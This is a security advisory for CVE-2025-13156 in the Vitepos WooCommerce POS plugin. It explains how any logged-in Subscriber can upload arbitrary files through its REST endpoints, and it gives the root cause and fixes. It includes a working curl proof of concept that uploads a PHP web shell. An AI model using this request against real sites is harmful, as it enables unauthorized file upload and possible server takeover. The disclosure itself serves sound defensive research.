# Vitepos-CVE-Report
Disclosure for CVE-2025-13156

# CVE-2025-13156 - Vulnerability in Vitepos – Point of Sale (POS) for WooCommerce

This repository discloses a vulnerability discovered in [Vitepos – Point of Sale (POS) for WooCommerce <= 3.3.0](https://wordpress.org/plugins/vitepos-lite/),WordPress plugin developed by appsbd.

## 🛠 Affected Version

- **Product**: Vitepos – Point of Sale (POS) for WooCommerce
- **Version**: ≤ v3.3.0
- **URL**: https://wordpress.org/plugins/vitepos-lite/

---

## 🔒 Assigned CVE
| CVE ID            | Type                      | Component                | Impact                    |
|-------------------|---------------------------|--------------------------|---------------------------|
| CVE-2025-13156    |  Authenticated (Subscriber+) Arbitrary File Upload to Remote Code Execution               |  modules/class-pos-settings.php  api/v1/class-pos-product-api.php             |  To upload arbitrary files on the affected site's server      |  

---

## 🧾 Detailed a Description

### CVE-2025-13156 — Authenticated (Subscriber+) Arbitrary File Upload

 - **Affected Component**: Site's server
 - **Attack Vector**: To upload arbitrary files on the affected site's server.
 - **Trigger**: This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which makes remote code execution possible.

```
curl -k \
  'http://localhost:8080/wp-json/vitepos/v1/product/add-category' \
  -H 'Cookie: wordpress_logged_in_<your_hash>=<your_cookie>' \
-H 'X-WP-Nonce: <your_nonce>' \
  -F 'category_name=evil' \
  -F 'category_parent=0' \
  -F 'category_description=PoC-shell' \
  -F 'category_image=@./shell.php;filename="shell.php";type=application/octet-stream'

```

 - **Impact**: Any authenticated user (including low-privileged roles like Subscriber) can upload arbitrary files to wp-content/uploads/<year>/<month>/ via the exposed Vitepos Lite REST endpoints. On servers where PHP execution is enabled (or can be re-enabled via uploaded configuration files), this leads to remote code execution; even when execution is blocked, attackers can host malicious payloads or craft stored XSS through uploaded HTML/SVG.This effectively gives any logged-in user arbitrary file write primitives.

## ❓Reason for the vulnerability

The plugin’s REST routes under /wp-json/vitepos/v1/product/... rely on a permissive permission check that effectively accepts any logged-in user (is_user_logged_in()), ignoring whether the caller is a POS user or has the capability to manage product terms. As a result, low-privileged roles (e.g., Subscriber) can reach endpoints like add-category/update-category.

- Gate each REST route with a strict permission_callback that checks current_user_can('manage_product_terms')
- Do not trust client filename/Content-Type; use wp_handle_upload() with a strict allowlist (e.g., JPEG/PNG/WebP) and wp_check_filetype_and_ext(); reject unknown or executable types.

## ひとこと
WebRoot直下には置けないため、環境によって成功しない場合がある。Uploads配下は基本PHPの実行が許可されていないので、よほど変な環境じゃないと無理じゃないかなあと思った。
MIME許可リストに`application/octet-stream`という文字列が見えた瞬間嫌な予感がしたが本当に成功してしまい、ビックリだった。
本来はWordPressのコア部分がPHPのアップロードを防いでいるのだが、このプラグインは独自の処理を実装していたため、今回の脆弱性が再現出来た。かな～りレアケースです。
## 🔍 Discoverer

**Name**: MooseLove  
**Role**: Independent security researcher / bug hunter  
**Contact**: Available upon request  

---

## 📚 References

- Product: https://wordpress.org/plugins/vitepos-lite/

---

## ⚠️ License

This advisory is provided for public security awareness. Free to share with attribution.
